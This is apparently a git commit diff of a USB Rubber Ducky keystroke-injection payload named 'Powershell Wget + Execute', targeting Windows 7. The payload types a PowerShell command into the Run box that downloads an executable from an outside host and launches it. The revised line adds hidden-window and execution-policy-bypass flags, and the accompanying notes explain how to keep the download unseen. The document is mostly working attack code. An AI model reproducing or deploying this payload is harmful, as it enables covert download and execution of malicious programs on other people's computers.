Updated Payload powershell wget execute (rdoc)
This commit is contained in:
parent
20c17fb051
commit
072906e290
|
@ -1,22 +1,16 @@
|
||||||
Powershell Wget + Execute
|
Powershell Wget + Execute
|
||||||
|
|
||||||
Author: mubix
|
Author: mubix
|
||||||
Duckencoder: 1.2
|
Duckencoder: 1.3
|
||||||
Target: Windows 7
|
Target: Windows 7
|
||||||
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
|
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 100
|
DELAY 100
|
||||||
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe"
|
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""
|
||||||
ENTER
|
ENTER
|
||||||
|
|
||||||
Adding two words to this makes it possible to hide the powershell window as it downloads and executes.
|
Note -windowstyle hidden hides the powershell window. Also mind the escaped quotes around $env:temp, otherwise the environment variable won't expand.
|
||||||
|
|
||||||
```
|
|
||||||
GUI r
|
|
||||||
DELAY 100
|
|
||||||
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe"
|
|
||||||
ENTER
|
|
||||||
```
|
|
||||||
|
|
||||||
|
|
||||||
Edited by: Fahad Alkamli
|
Edited by: Fahad Alkamli
|
||||||
|
|
Loading…
Reference in New Issue